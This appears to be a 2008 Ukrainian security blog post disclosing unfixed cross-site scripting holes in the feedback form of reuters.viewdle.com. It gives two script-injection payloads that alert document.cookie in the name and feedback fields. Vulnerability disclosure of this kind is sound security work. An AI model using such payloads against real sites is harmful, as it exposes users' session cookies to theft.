Уразливості на reuters.viewdle.com

22:42 20.09.2008

04.04.2008

У вересні, 21.09.2007, а також додатково сьогодні, я знайшов Cross-Site Scripting уразливості на проекті http://reuters.viewdle.com (сервіс пошуку в відео). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

20.09.2008

XSS:

XSS:

POST запит на сторінці http://reuters.viewdle.com/feedback
"><script>alert(document.cookie)</script>В полі: Your name.

</textarea><script>alert(document.cookie)</script>В полі: Feedback.

Дані уразливості досі не виправлені.


Leave a Reply

You must be logged in to post a comment.